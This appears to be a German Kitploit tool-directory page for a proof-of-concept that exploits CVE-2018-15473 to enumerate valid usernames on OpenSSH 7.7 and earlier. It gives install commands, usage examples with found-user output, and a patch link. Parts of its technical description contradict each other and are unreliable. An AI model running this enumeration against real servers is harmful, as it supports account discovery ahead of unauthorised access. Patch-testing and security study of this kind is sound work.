Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2018-15473 — SSH-Benutzernamen-Enumerationstool, das CVE-2018-15473 ausnutzt, um gültige Benutzer auf OpenSSH-Servern über eine zeitbasierte Authentifizierungsumgehung zu identifizieren. | Kitploit
Tools/GitHubGitHub/1stpeak/cve-2018-15473
AufklärungSchwachstellenanalyseExploitationInformationsbeschaffungNetzwerksicherheitPenetrationstests
GitHub1stpeak/cve-2018-15473

CVE-2018-15473

SSH-Benutzernamen-Enumerationstool, das CVE-2018-15473 ausnutzt, um gültige Benutzer auf OpenSSH-Servern über eine zeitbasierte Authentifizierungsumgehung zu identifizieren.

Repository anzeigen
vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2018-15473

Ursache

Der OpenSSH-Server verzögert die Verarbeitung eines ungültigen authentifizierten Benutzers nicht, bevor das Paket mit der Anfrage vollständig analysiert wurde. Diese Schwachstelle hängt mit auth2-gss.c, auth2-hostbased.c und auth2-pubkey.c zusammen.

Ausnutzung

Obwohl diese Schwachstelle nicht verwendet werden kann, um eine Liste gültiger Benutzernamen zu erstellen, kann sie dennoch zur Enumeration und Erratung von Benutzernamen verwendet werden.

Betroffene Versionen

OpenSSH <= 7.7

Nicht betroffene Versionen

openssh-7.8p1-1.fc28 openssh-7.6p1-6.fc27

Installation des PoC

Möglicherweise müssen Sie das äquivalente openssl-dev-Paket Ihrer Distribution installieren.

root@kitploit:~
# 注意:如果您在kali上安装,则可以跳过pip安装,只需执行下面第一二三行的步骤,因为paramiko已经存在。 
git clone https://github.com/1stPeak/CVE-2018-15473.git
cd CVE-2018-15473
chmod u+x ssh-username-enum.py
pip install -r requirements.txt 
# 或者使用以下命令下载安装 
pipenv install -r requirements.txt  # if you're cool like that   
chmod u+x ssh-username-enum.py

Anwendungsbeispiele

Beispiel 1: Einzelner Benutzer-Enumeration

root@kitploit:~
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -u root 192.168.1.2
[+] root found!

Beispiel 2: Mehrere Benutzer-Enumeration mit 10 Threads (Standard: 4 Threads)

root@kitploit:~
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -t 10 -w /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.2
[+] man found!
[+] guest found!
[+] nobody found!
[!] SSH negotiation failed for user nobody4.
[+] lpadmin found!
usw.

Beispiel 3: IPv6-Adresse mit angegebenem SSH-Port

root@kitploit:~
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -t 10 -w /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.2 '::1'
[+] ROOT found!
[+] syslog found!
[+] sslh found!
[!] SSH negotiation failed for user sssd.
[+] rfindd found!
[+] ultra found!
usw.

Lösung

Benutzern wird empfohlen, auf eine nicht betroffene Version zu aktualisieren. Das OpenBSD-Projekt hat den Quellcode-Fix unter folgendem Link veröffentlicht: https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0

Referenzen

https://github.com/epi052/cve-2018-15473
http://blog.nsfocus.net/openssh-cve-2018-15919/

Tool herunterladen